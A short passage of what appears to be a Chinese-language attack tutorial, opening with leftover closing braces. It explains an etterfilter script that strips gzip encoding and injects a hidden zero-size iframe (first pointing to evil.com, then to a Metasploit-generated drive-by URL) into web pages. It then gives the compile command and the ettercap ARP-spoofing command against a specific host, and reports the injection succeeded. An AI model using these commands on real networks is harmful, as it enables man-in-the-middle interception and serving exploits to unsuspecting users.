}
}
过滤脚本的功能 第一个if语句块,功能是如果ip协议匹配TCP,并且目标端口是80的话(一般是说浏览器浏览网页时候,对网站80端口发送请求),则搜索HTTP 数据流的Accept-ncoding,并且替换为Accept-Mousecat,然后在控制台打印一条“zappedAccept-Encoding”的消息,目的是为了避免目标客户端浏览器像启用了GZIP 这样的数据压缩功能。 第二个if 语句块,如果ip 协议匹配TCP,并且源端口是80的话,则搜索<body>关键字,
并且替换为<body> <iframe src=“http://evil.com/evil.html” width=0 height=0 >的代码,修改下脚本 我们的网马地址类似于http://192.168.1.103:8080/ZtfaWRsEf0 
网马的地址是msf生成的。现在我们就开始生成网马(姑且这么叫) 
最后编译一下脚本etterfilter -o ieexpft ieexp.filter 
下面启动ettercap 进行arp欺骗并挂马 我们对192.168.1.106进行arp欺骗 命令前面讲过了: ettercap -T -q -F ieexpft -M arp:remote /192.168.1.106/ //
已经启动了~~~我们现在随便打开一个网页看看
已经注入了我们的挂马代码~~~
